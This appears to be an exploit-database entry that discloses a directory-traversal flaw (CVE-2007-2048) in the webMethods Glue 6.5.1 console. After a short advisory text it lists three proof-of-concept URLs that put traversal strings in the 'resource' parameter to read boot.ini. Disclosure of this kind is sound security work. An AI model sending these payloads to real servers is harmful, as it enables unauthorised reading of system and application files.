webMethods Glue 6.5.1 Console - Directory Traversal

Author: Patrick Webster
type: remote
platform: windows
port: 
date_added: 2007-04-11  
date_updated: 2013-11-27  
verified: 1  
codes: CVE-2007-2048;OSVDB-34992  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 29843.txt  

source: https://www.securityfocus.com/bid/23423/info

webMethods Glue is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this vulnerability to retrieve arbitrary files from the vulnerable computer with the privileges of the affected application. Information obtained may aid in further attacks.

This issue affects webMethods Glue 6.5.1; other versions may also be vulnerable.

http://www.example.com:8080/console?resource=../../../boot.ini
http://www.example.com:8080/console?resource=\boot.ini
http://www.example.com:8080/console?resource=c:\boot.ini